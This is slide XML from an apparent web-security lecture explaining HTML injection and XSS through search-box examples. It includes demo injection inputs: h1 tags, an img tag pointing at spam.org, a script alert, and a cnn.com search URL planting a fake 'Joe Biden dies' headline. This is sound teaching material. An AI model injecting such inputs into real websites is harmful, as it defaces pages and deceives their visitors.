                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4788024" y="2348880"/>
              <a:ext cx="1800225" cy="53975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Search</a:t>
              </a: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2267074" y="2996952"/>
              <a:ext cx="4824536" cy="39307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No matches found for </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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&lt;h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800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sos</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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&lt;/h1&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="18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proper input encoding should produce</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/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05E4B9C-F2DD-4BB6-8F39-F118B091CC89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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2167731" y="1073179"/>
            <a:ext cx="5042905" cy="1724604"/>
            <a:chOff x="2050715" y="1891346"/>
            <a:chExt cx="5042905" cy="1897694"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37893" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2051720" y="2060848"/>
              <a:ext cx="5041900" cy="1728192"/>
            </a:xfrm>
            <a:prstGeom prst="rect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7894" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2050715" y="1891346"/>
              <a:ext cx="5041900" cy="180975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333CC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37895" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2483768" y="2348880"/>
              <a:ext cx="1981200" cy="371513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Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>sos</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/h1&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>     </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37896" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4788024" y="2348880"/>
              <a:ext cx="1800225" cy="53975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Search</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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2987824" y="2996952"/>
              <a:ext cx="3167682" cy="4088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No matches found for</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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sos</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1800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1351373" y="4646703"/>
            <a:ext cx="4032390" cy="71024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3513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More complicated HTML code as search term ? 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10754"/>
            <a:ext cx="8229600" cy="5865515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="331788" indent="-331788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2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> source="http://www.spam.org/advert.jpg"&gt;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62BF977-BE2F-454C-892F-4DFB25A80525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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"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47664" y="1748985"/>
            <a:ext cx="5199827" cy="3146716"/>
            <a:chOff x="1579811" y="2154492"/>
            <a:chExt cx="5199827" cy="3146716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1737738" y="2347615"/>
              <a:ext cx="5041900" cy="2953593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737738" y="2154492"/>
              <a:ext cx="5041900" cy="180975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333CC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2113976" y="2827040"/>
              <a:ext cx="1981200" cy="371513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 dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>img</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> source=“ </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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0" name="AutoShape 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4453951" y="2827040"/>
              <a:ext cx="1800225" cy="53975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Search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1579811" y="3749154"/>
              <a:ext cx="304953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Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800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No matches found for</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48133" name="Picture 5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9471" r="10023"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4892179" y="3919953"/>
              <a:ext cx="1224136" cy="1188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499036227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More complicated HTML code as search term ? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405001" y="1181299"/>
            <a:ext cx="8229600" cy="2160240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="331788" indent="-331788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</a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; alert(‘Hello World!’); &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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62BF977-BE2F-454C-892F-4DFB25A80525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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/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699524" y="1830015"/>
            <a:ext cx="5057775" cy="3600401"/>
            <a:chOff x="1979712" y="2420888"/>
            <a:chExt cx="5057775" cy="3600401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979712" y="2662189"/>
              <a:ext cx="5041900" cy="3359100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF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995587" y="2420888"/>
              <a:ext cx="5041900" cy="180975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333CC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1" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2355950" y="3141613"/>
              <a:ext cx="1981200" cy="371513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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 dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;script </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>langu</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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4695925" y="3141613"/>
              <a:ext cx="1800225" cy="539750"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="99CCFF"/>
            </a:solidFill>
            <a:ln w="2844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Search</a:t>
              </a:r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2941766" y="4652913"/>
              <a:ext cx="3049530" cy="37151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>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc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800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" b="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No matches found for</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2049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91880" y="4005064"/>
              <a:ext cx="1771650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CAD57F-AD93-D802-121D-DE0AECC5E40B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940353" y="5714976"/>
            <a:ext cx="672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  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS (Cros site scripting) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: special cases of HTML injection,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where attacker input is executed as JavaScript   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614124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/>
              <a:t> HTML injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty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856984" cy="5303614"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="331788" indent="-331788" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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sz="2000" dirty="0"/>
              <a:t>HTML injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user input is ‘echoed’ back  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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US" dirty="0"/>
              <a:t>	                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>without encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>But why is this a security problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="331788" indent="-331788" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="331788" algn="l"/>
                <a:tab pos="444500" algn="l"/>
                <a:tab pos="901700" algn="l"/>
                <a:tab pos="1358900" algn="l"/>
                <a:tab pos="1816100" algn="l"/>
                <a:tab pos="2273300" algn="l"/>
                <a:tab pos="2730500" algn="l"/>
                <a:tab pos="3187700" algn="l"/>
                <a:tab pos="3644900" algn="l"/>
                <a:tab pos="4102100" algn="l"/>
                <a:tab pos="4559300" algn="l"/>
                <a:tab pos="5016500" algn="l"/>
                <a:tab pos="5473700" algn="l"/>
                <a:tab pos="5930900" algn="l"/>
                <a:tab pos="6388100" algn="l"/>
                <a:tab pos="6845300" algn="l"/>
                <a:tab pos="7302500" algn="l"/>
                <a:tab pos="7759700" algn="l"/>
                <a:tab pos="8216900" algn="l"/>
                <a:tab pos="8674100" algn="l"/>
                <a:tab pos="9131300" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPlain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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simple HTML injection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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D60093"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can deface a webpage, with pop-ups,  ads,  or fake info  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://cnn.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>search?string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=”&lt;h1&gt;Joe Biden dies&lt;/h1&gt;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sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=.......&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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1800" dirty="0"/>
              <a:t>       Such HTML injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abuses trust  that a user has in a website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:                          user believes content is from the website, but it comes from an attacker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sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPlain" startAt="2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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the injected HTML contains JavaScript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dirty="0"/>
              <a:t>       Execution of this code can have all sorts of nasty effects...</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/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US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              <a:buChar char="•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dirty="0">
              <a:solidFill>
                <a:srgbClr val="0033CC"/>
              </a:solidFill>
            </a:endParaRP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940FB92C-7263-40D0-B150-9781DAE26770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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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868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HTML injection &amp; XSS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704245" y="4891806"/>
            <a:ext cx="72728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client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>processing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> includes: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rendering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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="20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HTML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>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F070403050403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i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executing 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0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JavaScript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>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WebAssembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)  which can interact with the browser using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web APIs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. for camera, sound, …)  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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249521" y="1347914"/>
            <a:ext cx="274312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malicious  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ieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB" sz="36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ieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878504" y="3317100"/>
            <a:ext cx="2054169" cy="12095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browser</a:t>
            </a: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99" y="2978918"/>
            <a:ext cx="930796" cy="809575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879" y="3508068"/>
            <a:ext cx="431140" cy="497183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Curved Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1284764" y="2995687"/>
            <a:ext cx="794516" cy="501041"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 67231"/>
              <a:gd name="adj3" fmla="val 274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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448335" y="3155433"/>
            <a:ext cx="202993" cy="12526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41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1907221" y="3186748"/>
            <a:ext cx="135328" cy="6263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465356A2-E039-8B14-BB9C-881F1B055B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20752490">
            <a:off x="3059293" y="3102364"/>
            <a:ext cx="2786678" cy="498058"/>
            <a:chOff x="3479585" y="2038019"/>
            <a:chExt cx="2349488" cy="498058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Right Arrow 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3479585" y="2038019"/>
              <a:ext cx="2349488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5" name="Rechthoek 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4489345" y="2188879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hthoek 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4812343" y="2206564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hthoek 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4139952" y="2198416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CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51FAF63B-8397-9252-F090-5619989E1352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842128" y="1867186"/>
            <a:ext cx="2581560" cy="143780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web server</a:t>
            </a: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0" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33FA5EED-E582-D6AA-0257-717AFFA6929B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="988474" y="1255779"/>
            <a:ext cx="2054169" cy="120958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browser</a:t>
            </a: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28" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8578B37-52BD-6279-85EB-D07C9C060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419" y="1112153"/>
            <a:ext cx="659527" cy="659527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Afbeelding 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2936339C-EA21-799D-6321-04C4424C88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98" y="994561"/>
            <a:ext cx="894710" cy="89471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D70F050D-E119-2E48-473D-7D51CC0ECC33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="11221186">
            <a:off x="3167243" y="1926290"/>
